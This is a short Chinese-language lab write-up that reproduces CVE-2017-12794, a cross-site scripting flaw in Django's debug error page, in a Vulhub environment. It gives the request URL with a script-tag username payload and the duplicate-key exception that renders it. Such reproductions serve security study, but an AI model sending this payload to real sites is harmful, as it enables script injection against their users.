Django debug page XSS漏洞复现_(CVE-2017-12794)

复现过程

首先进入靶场环境

按照他写的，需要给这个变量赋值

创建一个用户，用弹窗做用户名

http://10.4.7.137:8000/create_user/?username=<script>alert(1)</script>

返回，然后再创建一个一样的

触发异常弹窗

异常为

duplicate key value violates unique constraint "xss_user_username_key"
DETAIL:  Key (username)=(<script>alert(1)</script>) already exists.

详情见

https://vulhub.org/#/environments/django/CVE-2017-12794/